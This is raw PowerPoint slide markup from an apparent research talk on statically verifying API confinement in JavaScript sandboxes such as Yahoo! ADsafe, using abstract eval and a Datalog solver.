              <a:rPr lang="en-US" sz="2400" dirty="0" smtClean="0"/>
              <a:t>Abstract </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0" err="1" smtClean="0">
                <a:latin typeface="Courier"/>
                <a:cs typeface="Courier"/>
              </a:rPr>
              <a:t>eval</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0" err="1" smtClean="0"/>
              <a:t>(</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" i="1" dirty="0" err="1" smtClean="0">
                <a:latin typeface="Times"/>
                <a:cs typeface="Times"/>
              </a:rPr>
              <a:t>s</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" i="1" dirty="0" smtClean="0">
                <a:latin typeface="Times"/>
                <a:cs typeface="Times"/>
              </a:rPr>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" i="1" dirty="0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2400" baseline="-25000" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="0000FF"/>
                </a:solidFill>
                <a:latin typeface="Times"/>
                <a:cs typeface="Times"/>
              </a:rPr>
              <a:t>1</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="0000FF"/>
                </a:solidFill>
                <a:latin typeface="Times"/>
                <a:cs typeface="Times"/>
              </a:rPr>
              <a:t>,…,</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" i="1" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="0000FF"/>
                </a:solidFill>
                <a:latin typeface="Times"/>
                <a:cs typeface="Times"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" i="1" dirty="0" err="1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2400" i="1" baseline="-25000" dirty="0" err="1" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="0000FF"/>
                </a:solidFill>
                <a:latin typeface="Times"/>
                <a:cs typeface="Times"/>
              </a:rPr>
              <a:t>n</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0" smtClean="0"/>
              <a:t>) by saturating predicates with {</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" i="1" dirty="0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2400" baseline="-25000" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="0000FF"/>
                </a:solidFill>
                <a:latin typeface="Times"/>
                <a:cs typeface="Times"/>
              </a:rPr>
              <a:t>1</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="0000FF"/>
                </a:solidFill>
                <a:latin typeface="Times"/>
                <a:cs typeface="Times"/>
              </a:rPr>
              <a:t>,…,</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" i="1" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="0000FF"/>
                </a:solidFill>
                <a:latin typeface="Times"/>
                <a:cs typeface="Times"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" i="1" dirty="0" err="1" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="0000FF"/>
                </a:solidFill>
                <a:latin typeface="Times"/>
                <a:cs typeface="Times"/>
              </a:rPr>
              <a:t>x</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" i="1" baseline="-25000" dirty="0" err="1" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="0000FF"/>
                </a:solidFill>
                <a:latin typeface="Times"/>
                <a:cs typeface="Times"/>
              </a:rPr>
              <a:t>n</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0" smtClean="0"/>
              <a:t>}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</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0">
                <a:latin typeface="Courier"/>
                <a:cs typeface="Courier"/>
              </a:rPr>
              <a:t>eval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1106269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Courier"/>
                <a:cs typeface="Courier"/>
              </a:rPr>
              <a:t>eval</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="3600" dirty="0" err="1" smtClean="0"/>
              <a:t>(</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="3600" i="1" dirty="0" err="1" smtClean="0">
                <a:latin typeface="Times"/>
                <a:cs typeface="Times"/>
              </a:rPr>
              <a:t>s</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="3600" i="1" dirty="0" smtClean="0">
                <a:latin typeface="Times"/>
                <a:cs typeface="Times"/>
              </a:rPr>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="3600" i="1" dirty="0" err="1" smtClean="0">
                <a:latin typeface="Times"/>
                <a:cs typeface="Times"/>
              </a:rPr>
              <a:t>x</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="3600" i="1" dirty="0" smtClean="0">
                <a:latin typeface="Times"/>
                <a:cs typeface="Times"/>
              </a:rPr>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="3600" i="1" dirty="0" err="1" smtClean="0">
                <a:latin typeface="Times"/>
                <a:cs typeface="Times"/>
              </a:rPr>
              <a:t>y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228600" y="2057400"/>
            <a:ext cx="8991600" cy="3046988"/>
            <a:chOff x="76200" y="1945481"/>
            <a:chExt cx="8839200" cy="3046988"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="9" name="TextBox 8"/>
            <p:cNvSpPr txBox="1"/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="76200" y="1945481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-274320"/>
              <a:r>
                <a:rPr lang="en-US" sz="2400" b="1" dirty="0" smtClean="0"/>
                <a:t>Main Idea: </a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" sz="2400" dirty="0" smtClean="0"/>
                <a:t>Generate all possible facts using variables {</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" sz="2400" i="1" dirty="0" err="1" smtClean="0">
                  <a:latin typeface="Times"/>
                  <a:cs typeface="Times"/>
                </a:rPr>
                <a:t>x</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" sz="2400" dirty="0" smtClean="0">
                  <a:latin typeface="Times"/>
                  <a:cs typeface="Times"/>
                </a:rPr>
                <a:t>, </a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" sz="2400" dirty="0" err="1" smtClean="0">
                  <a:latin typeface="Times"/>
                  <a:cs typeface="Times"/>
                </a:rPr>
                <a:t>y</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" sz="2400" dirty="0" smtClean="0"/>
                <a:t>}</a:t>
              </a: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err="1" smtClean="0">
                  <a:latin typeface="Times"/>
                  <a:cs typeface="Times"/>
                </a:rPr>
                <a:t>Assign(x</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" sz="2400" i="1" dirty="0" smtClean="0">
                  <a:latin typeface="Times"/>
                  <a:cs typeface="Times"/>
                </a:rPr>
                <a:t>, </a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" sz="2400" i="1" dirty="0" err="1" smtClean="0">
                  <a:latin typeface="Times"/>
                  <a:cs typeface="Times"/>
                </a:rPr>
                <a:t>x</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" sz="2400" i="1" dirty="0" smtClean="0">
                  <a:latin typeface="Times"/>
                  <a:cs typeface="Times"/>
                </a:rPr>
                <a:t>)</a:t>
              </a:r>
              <a:endParaRPr lang="en-US" sz="2400" i="1" dirty="0" smtClean="0">
                <a:latin typeface="Times"/>
                <a:cs typeface="Calibri"/>
              </a:endParaRP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err="1" smtClean="0">
                  <a:latin typeface="Times"/>
                  <a:cs typeface="Calibri"/>
                </a:rPr>
                <a:t>Assign(x</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" sz="2400" i="1" dirty="0" smtClean="0">
                  <a:latin typeface="Times"/>
                  <a:cs typeface="Calibri"/>
                </a:rPr>
                <a:t>, </a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" sz="2400" i="1" dirty="0" err="1" smtClean="0">
                  <a:latin typeface="Times"/>
                  <a:cs typeface="Calibri"/>
                </a:rPr>
                <a:t>y</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" sz="2400" i="1" dirty="0" smtClean="0">
                  <a:latin typeface="Times"/>
                  <a:cs typeface="Calibri"/>
                </a:rPr>
                <a:t>)</a:t>
              </a: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smtClean="0">
                  <a:latin typeface="Times"/>
                  <a:cs typeface="Times"/>
                </a:rPr>
                <a:t>…</a:t>
              </a:r>
              <a:endParaRPr lang="en-US" sz="2400" dirty="0" smtClean="0">
                <a:latin typeface="Times"/>
                <a:cs typeface="Calibri"/>
              </a:endParaRP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err="1" smtClean="0">
                  <a:latin typeface="Times"/>
                  <a:cs typeface="Times"/>
                </a:rPr>
                <a:t>Store(x</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" sz="2400" i="1" dirty="0" smtClean="0">
                  <a:latin typeface="Times"/>
                  <a:cs typeface="Times"/>
                </a:rPr>
                <a:t>, </a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" sz="2200" dirty="0" smtClean="0">
                  <a:latin typeface="Courier"/>
                  <a:cs typeface="Courier"/>
                </a:rPr>
                <a:t>All</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" sz="2400" dirty="0" smtClean="0">
                  <a:latin typeface="Times"/>
                  <a:cs typeface="Times"/>
                </a:rPr>
                <a:t>, </a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" sz="2400" i="1" dirty="0" err="1" smtClean="0">
                  <a:latin typeface="Times"/>
                  <a:cs typeface="Times"/>
                </a:rPr>
                <a:t>x</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" sz="2400" i="1" dirty="0" smtClean="0">
                  <a:latin typeface="Times"/>
                  <a:cs typeface="Times"/>
                </a:rPr>
                <a:t>)</a:t>
              </a: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err="1" smtClean="0">
                  <a:latin typeface="Times"/>
                  <a:cs typeface="Times"/>
                </a:rPr>
                <a:t>Store(x</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" sz="2400" i="1" dirty="0" smtClean="0">
                  <a:latin typeface="Times"/>
                  <a:cs typeface="Times"/>
                </a:rPr>
                <a:t>, </a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" sz="2200" dirty="0" smtClean="0">
                  <a:latin typeface="Courier"/>
                  <a:cs typeface="Courier"/>
                </a:rPr>
                <a:t>All</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" sz="2400" dirty="0" smtClean="0">
                  <a:latin typeface="Times"/>
                  <a:cs typeface="Times"/>
                </a:rPr>
                <a:t>, </a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" sz="2400" i="1" dirty="0" err="1" smtClean="0">
                  <a:latin typeface="Times"/>
                  <a:cs typeface="Times"/>
                </a:rPr>
                <a:t>y</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" sz="2400" i="1" dirty="0" smtClean="0">
                  <a:latin typeface="Times"/>
                  <a:cs typeface="Times"/>
                </a:rPr>
                <a:t>)</a:t>
              </a:r>
            </a:p>
            <a:p>
              <a:pPr lvl="1" indent="-274320">
                <a:buFont typeface="Lucida Grande"/>
                <a:buChar char="-"/>
              </a:pPr>
              <a:r>
                <a:rPr lang="en-US" sz="2400" i="1" dirty="0" smtClean="0">
                  <a:latin typeface="Times"/>
                  <a:cs typeface="Times"/>
                </a:rPr>
                <a:t>…</a:t>
              </a:r>
            </a:p>
            <a:p>
              <a:pPr marL="0" lvl="1" indent="-274320"/>
              <a:r>
                <a:rPr lang="en-US" sz="2400" dirty="0" smtClean="0"/>
                <a:t>See paper for  full description</a:t>
              </a:r>
            </a:p>
            <a:p>
              <a:endParaRPr lang="en-US" dirty="0"/>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="8" name="Rounded Rectangular Callout 7"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="3297264" y="2743200"/>
              <a:ext cx="5029200" cy="914400"/>
            </a:xfrm>
            <a:prstGeom prst="wedgeRoundRectCallout">
              <a:avLst>
                <a:gd name="adj1" fmla="val -75631"/>
                <a:gd name="adj2" fmla="val 41667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 indent="-274320"/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Store(x</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" sz="2400" i="1" dirty="0" smtClean="0">
                  <a:solidFill>
                    <a:schemeClr val="tx1"/>
                  </a:solidFill>
                  <a:latin typeface="Times"/>
                  <a:cs typeface="Times"/>
                </a:rPr>
                <a:t>, </a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" sz="2200" i="1" dirty="0" err="1" smtClean="0">
                  <a:solidFill>
                    <a:schemeClr val="tx1"/>
                  </a:solidFill>
                  <a:latin typeface="Courier"/>
                  <a:cs typeface="Courier"/>
                </a:rPr>
                <a:t>f</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" sz="2400" dirty="0" smtClean="0">
                  <a:solidFill>
                    <a:schemeClr val="tx1"/>
                  </a:solidFill>
                  <a:latin typeface="Times"/>
                  <a:cs typeface="Times"/>
                </a:rPr>
                <a:t>, </a:t>
              </a:r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y</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" sz="2400" i="1" dirty="0" smtClean="0">
                  <a:solidFill>
                    <a:schemeClr val="tx1"/>
                  </a:solidFill>
                  <a:latin typeface="Times"/>
                  <a:cs typeface="Times"/>
                </a:rPr>
                <a:t>) </a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" sz="2400" dirty="0" smtClean="0">
                  <a:solidFill>
                    <a:schemeClr val="tx1"/>
                  </a:solidFill>
                  <a:latin typeface="Times"/>
                  <a:cs typeface="Times"/>
                </a:rPr>
                <a:t>:- </a:t>
              </a:r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Store(x</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" sz="2400" i="1" dirty="0" smtClean="0">
                  <a:solidFill>
                    <a:schemeClr val="tx1"/>
                  </a:solidFill>
                  <a:latin typeface="Times"/>
                  <a:cs typeface="Times"/>
                </a:rPr>
                <a:t>, </a:t>
              </a:r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All</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" sz="2400" dirty="0" smtClean="0">
                  <a:solidFill>
                    <a:schemeClr val="tx1"/>
                  </a:solidFill>
                  <a:latin typeface="Times"/>
                  <a:cs typeface="Times"/>
                </a:rPr>
                <a:t>, </a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" sz="2400" i="1" dirty="0" err="1" smtClean="0">
                  <a:solidFill>
                    <a:schemeClr val="tx1"/>
                  </a:solidFill>
                  <a:latin typeface="Times"/>
                  <a:cs typeface="Times"/>
                </a:rPr>
                <a:t>y</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" sz="2400" i="1" dirty="0" smtClean="0">
                  <a:solidFill>
                    <a:schemeClr val="tx1"/>
                  </a:solidFill>
                  <a:latin typeface="Times"/>
                  <a:cs typeface="Times"/>
                </a:rPr>
                <a:t>)</a:t>
              </a:r>
            </a:p>
            <a:p>
              <a:pPr lvl="1" indent="-274320"/>
              <a:endParaRPr lang="en-US" sz="2400" i="1" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Times"/>
                <a:cs typeface="Time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Soundness of our Decision Procedure</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="3400" i="1" dirty="0">
              <a:latin typeface="Times"/>
              <a:cs typeface="Time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28600" y="5562600"/>
            <a:ext cx="8763000" cy="533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Soundness Theorem: </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2200" i="1" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Procedure returns </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2200" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
              </a:rPr>
              <a:t>CONFINED</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2200" i="1" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Times"/>
                <a:cs typeface="Times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Times"/>
                <a:cs typeface="Times"/>
              </a:rPr>
              <a:t>=&gt; </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2200" i="1" dirty="0" err="1" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Times"/>
                <a:cs typeface="Times"/>
              </a:rPr>
              <a:t>Confine(t</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2200" i="1" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Times"/>
                <a:cs typeface="Times"/>
              </a:rPr>
              <a:t>, critical)</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2200" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Times"/>
                <a:cs typeface="Times"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r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032" y="2444363"/>
            <a:ext cx="2135604" cy="3843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Trusted code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6032" y="3335757"/>
            <a:ext cx="2135604" cy="6359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Courier"/>
                <a:cs typeface="Courier"/>
              </a:rPr>
              <a:t>eval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with free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vars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”</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Courier"/>
                <a:cs typeface="Courier"/>
              </a:rPr>
              <a:t>test”,“api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”</a:t>
            </a:r>
            <a:endParaRPr lang="en-US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032" y="4505070"/>
            <a:ext cx="2135604" cy="6035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Environment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(Built-ins)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032" y="3895470"/>
            <a:ext cx="21356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"/>
                <a:cs typeface="Courier"/>
              </a:rPr>
              <a:t>+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032" y="2713784"/>
            <a:ext cx="21356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"/>
                <a:cs typeface="Courier"/>
              </a:rPr>
              <a:t>+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1908175"/>
            <a:ext cx="2362200" cy="327342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2590800" y="3429000"/>
            <a:ext cx="609600" cy="304800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4" name="Alternate Process 23"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3352800" y="2743199"/>
            <a:ext cx="2209800" cy="182893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Calibri"/>
                <a:cs typeface="Calibri"/>
              </a:rPr>
              <a:t>Datalog</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" b="1" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
              </a:rPr>
              <a:t> Solver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(least fixed point) </a:t>
            </a:r>
            <a:endParaRPr lang="en-US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95600" y="1219200"/>
            <a:ext cx="29718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/>
                <a:cs typeface="Calibri"/>
              </a:rPr>
              <a:t>Inference  Rules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SES</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" baseline="-25000" dirty="0" err="1" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
              </a:rPr>
              <a:t>light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semantics)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4191000" y="2206493"/>
            <a:ext cx="304800" cy="460507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8" name="Decision 27"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6324600" y="2895600"/>
            <a:ext cx="2742404" cy="1208759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24600" y="3245820"/>
            <a:ext cx="2742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Times"/>
                <a:cs typeface="Times"/>
              </a:rPr>
              <a:t>Stack(</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1700" dirty="0" err="1" smtClean="0">
                <a:latin typeface="Courier"/>
                <a:cs typeface="Courier"/>
              </a:rPr>
              <a:t>“test</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1700" dirty="0" smtClean="0">
                <a:latin typeface="Courier"/>
                <a:cs typeface="Courier"/>
              </a:rPr>
              <a:t>”</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" i="1" dirty="0" smtClean="0">
                <a:latin typeface="Times"/>
                <a:cs typeface="Times"/>
              </a:rPr>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" i="1" dirty="0" err="1" smtClean="0">
                <a:latin typeface="Times"/>
                <a:cs typeface="Times"/>
              </a:rPr>
              <a:t>l</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" i="1" dirty="0" smtClean="0">
                <a:latin typeface="Times"/>
                <a:cs typeface="Times"/>
              </a:rPr>
              <a:t>)</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0">
                <a:latin typeface="Times"/>
                <a:cs typeface="Times"/>
              </a:rPr>
              <a:t> ∧</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0" smtClean="0">
              <a:latin typeface="Times"/>
              <a:ea typeface="ＭＳ ゴシック"/>
              <a:cs typeface="Times"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr algn="ctr"/>
            <a:r>
              <a:rPr lang="en-US" i="1" dirty="0" err="1" smtClean="0">
                <a:latin typeface="Times"/>
                <a:ea typeface="ＭＳ ゴシック"/>
                <a:cs typeface="Times"/>
              </a:rPr>
              <a:t>Critical(l</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" i="1" dirty="0" smtClean="0">
                <a:latin typeface="Times"/>
                <a:ea typeface="ＭＳ ゴシック"/>
                <a:cs typeface="Times"/>
              </a:rPr>
              <a:t>) </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2200" dirty="0" smtClean="0">
                <a:latin typeface="Times"/>
                <a:ea typeface="ＭＳ ゴシック"/>
                <a:cs typeface="Times"/>
              </a:rPr>
              <a:t>?</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:cxnSp>
        <p:nvCxnSpPr>
          <p:cNvPr id="31" name="Straight Arrow Connector 30"/>
          <p:cNvCxnSpPr>
            <a:stCxn id="28" idx="0"/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm rot="5400000" flipH="1" flipV="1">
            <a:off x="7314802" y="2514600"/>
            <a:ext cx="762000" cy="1588"/>
          </a:xfrm>
          <a:prstGeom prst="straightConnector1">
            <a:avLst/>
          </a:prstGeom>
          <a:ln w="50800">
            <a:solidFill>
              <a:schemeClr val="accent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5638800" y="3352800"/>
            <a:ext cx="609600" cy="304800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0" y="1676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 CONFINED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7162800" y="493389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CONFINED</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="2000" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:cxnSp>
        <p:nvCxnSpPr>
          <p:cNvPr id="44" name="Straight Arrow Connector 43"/>
          <p:cNvCxnSpPr>
            <a:stCxn id="28" idx="2"/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm rot="16200000" flipH="1">
            <a:off x="7281236" y="4518925"/>
            <a:ext cx="829531" cy="398"/>
          </a:xfrm>
          <a:prstGeom prst="straightConnector1">
            <a:avLst/>
          </a:prstGeom>
          <a:ln w="50800">
            <a:solidFill>
              <a:schemeClr val="accent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696200" y="2514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696200" y="40502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52400" y="1908175"/>
            <a:ext cx="236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Abstraction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1447800"/>
            <a:ext cx="9144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language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Sandboxing technique for untrusted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 for verifying confinement of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</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="en-US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APIs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>
                <a:solidFill>
                  <a:srgbClr val="0000FF"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Applications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3810000"/>
            <a:ext cx="8686800" cy="7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Implemented procedure in the form of a tool </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" b="1" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>ENCAP</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
              <a:t> (open source)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-274320"/>
            <a:r>
              <a:rPr lang="en-US" sz="2600" dirty="0" smtClean="0"/>
              <a:t>Code that is a key part of the trusted computing  base</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" lvl="2" indent="-274320"/>
            <a:r>
              <a:rPr lang="en-US" sz="2600" dirty="0" smtClean="0"/>
              <a:t>Small in size, relative to the application</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" lvl="2" indent="-274320"/>
            <a:r>
              <a:rPr lang="en-US" sz="2600" dirty="0" smtClean="0"/>
              <a:t>Written in a disciplined manner</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" lvl="2" indent="-274320"/>
            <a:r>
              <a:rPr lang="en-US" sz="2600" dirty="0" smtClean="0"/>
              <a:t>Developers have an incentive for keeping the code simple</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" lvl="2">
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr lang="en-US" sz="2600" b="1" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="0" lvl="2">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2600" b="1" dirty="0" smtClean="0"/>
              <a:t>This Work:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="240030" indent="-514350">
              <a:buFont typeface="+mj-lt"/>
              <a:buAutoNum type="arabicPeriod"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2600" u="sng" dirty="0" smtClean="0"/>
              <a:t>Yahoo! </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2600" u="sng" dirty="0" err="1" smtClean="0"/>
              <a:t>ADSafe</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2600" u="sng" dirty="0" smtClean="0"/>
              <a:t> DOM API</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="240030" indent="-514350">
              <a:buFont typeface="+mj-lt"/>
              <a:buAutoNum type="arabicPeriod"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2600" dirty="0" smtClean="0"/>
              <a:t>Benchmark example from the Object-Capabilities literature</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" lvl="1" indent="-27432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Yahoo! Adsafe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67200" y="1905000"/>
            <a:ext cx="4876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indent="-182880">
              <a:buFont typeface="Arial"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2000" b="1" dirty="0" smtClean="0"/>
              <a:t>ADSAFE object (API)</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" smtClean="0"/>
              <a:t>: </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1" indent="-182880">
              <a:buFont typeface="Lucida Grande"/>
              <a:buChar char="-"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Provides methods for manipulating the DOM</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1" indent="-182880">
              <a:buFont typeface="Lucida Grande"/>
              <a:buChar char="-"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Stored in variable “</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0">
                <a:latin typeface="Courier"/>
                <a:cs typeface="Courier"/>
              </a:rPr>
              <a:t>ADSAFE”</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1" indent="-182880">
              <a:buFont typeface="Lucida Grande"/>
              <a:buChar char="-"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0">
                <a:latin typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
              </a:rPr>
              <a:t>Implemented in 2000 LOC </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr indent="-182880"/>
            <a:endParaRPr lang="en-US" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:pPr indent="-182880">
              <a:buFont typeface="Arial"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2000" b="1" dirty="0" err="1" smtClean="0"/>
              <a:t>JSLint</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" b="1" dirty="0" smtClean="0"/>
              <a:t> (Sandbox)</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" smtClean="0"/>
              <a:t>: </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1" indent="-182880">
              <a:buFont typeface="Lucida Grande"/>
              <a:buChar char="-"/>
            </a:pPr>
            <a:r>
